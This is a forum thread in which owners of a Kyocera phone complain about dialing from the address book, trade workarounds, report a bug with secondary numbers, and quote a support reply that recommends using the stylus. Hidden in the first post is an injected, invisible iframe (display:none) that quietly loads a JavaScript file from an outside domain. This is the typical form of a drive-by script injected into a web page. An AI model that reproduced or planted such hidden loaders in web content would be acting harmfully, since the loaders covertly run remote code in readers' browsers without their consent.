Address Book

Voice dialing... Great!
Speed Dialling.... Fantastic!!
One Handed Address book navigation and dialling..... AWFULL!

This is my only complaint. Maybe I am doing something wrong but so far the only way I can dial a number in my address book is to find their name. Then select the number from the drop down list on the right for the number I want to dial. Then tab that number once select. Anyone else find this a pain while driving? So far I have been close to rear ending someone twice because of this!

Wouldn't it make more sense to just have their names in one big list where you can see the whole name of the person. Then you click the "OK" button which would bring up all their info, like it does now. But when you navigate through that info and highlight the number or email address and click "OK" again it ether dials your phone or opens the Email Client instead of the edit contact info page???

Just my 2 Cents. If their is another way around this please list the steps! I sware before the end of the summer I am going to get in an accident because of this!

BTW... Thats my only real problem with the phone. Awsome Product.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is the way I dial from the address book:

I use the keypad to enter the first letter or two of the person's name and this will highlight the correct contact. Then:

Scenario 1: If the number in the right hand drop down menu is what I want to dial, I simply hit the green TALK button and it dials.

Scenario2: If the number/email on the right drop down menu is not the correct number I want to dial, I hit the ok button which then brings up all the emails/phone numbers associated with this person. I then scroll to the one I want, and hit the TALK (not the OK) button and it dials.

I found a bug.

I see why i thought that was not working. After hitting the ok button where you can select one of the other numbers, if the number you select was not the primary number showing in the drop down on the following screen it will dial. But if you select the number in that second screen that is the primary number it will not dial. This must be a bug.

Can someone confirm this on their phone?

Mine works correctly. Whichever number I select (primary or other), it dials it when I press the green "dial" key.

Mine does not work correctly. If I select a contact, hit OK and scroll to the PRIMARY number, then hit the green send key, I'm taken to the phone screen and the number is dialed. If I scroll to any other phone number for that contact and hit the green send key I'm taken to the phone screen, but nothing happens.

I've enclosed the response from Kyocera on this issue:

Thank you for contacting Kyocera Wireless. I understand that you are unable to dial any number other than the primary number in your Address book.

In some cases, you will need to use the stylus rather than the silver OK button.

1) Tap on the number field

2) Tap on the desired number

3) Tap on it again or press the silver OK button to select it

4) If dialing does not start, tap the green Dial button

Additionally, even using this method may not allow you to dial beyond the second number for addresses that were not originally entered on the phone. We are currently researching possible causes and work-arrounds. As more information is developed, it will be posted to our website.

If your issue is still unresolved, do not hesitate to contact us again. Please refer to case number: 37575 when responding.

AHH, That explains it. Most, if not all of my contacts have been added to the phone through Pocket Mirror Pro. I guess I will have to wait for the the update.

Thanks for taking the time to call the support number twogeckos!
